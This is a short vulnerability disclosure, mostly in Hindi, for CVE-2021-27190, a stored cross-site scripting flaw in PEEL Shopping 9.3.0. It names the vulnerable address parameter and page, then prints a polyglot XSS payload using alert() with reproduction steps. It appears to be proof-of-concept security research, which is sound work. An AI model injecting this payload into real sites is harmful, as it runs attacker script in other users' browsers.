
2021-02-11
Anmol K Sachan
https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/
https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing
PEEL SHOPPING 9.3.0
संग्रहीत क्रॉस-साइट स्क्रिप्टिंग
Stored XSS
CVE-2021-27190
यह एप्लिकेशन Stored XSS भेद्यता के प्रति संवेदनशील है।
http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## असुरक्षित पैरामीटर
'पता'
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
जिस पृष्ठ पर हमने पेलोड इंजेक्ट किया था, उसी पृष्ठ पर पता संपादित करने के लिए टेक्स्ट बॉक्स पर क्लिक करें।
आप देखेंगे कि आपका जावास्क्रिप्ट कोड (XSS) निष्पादित हो गया है।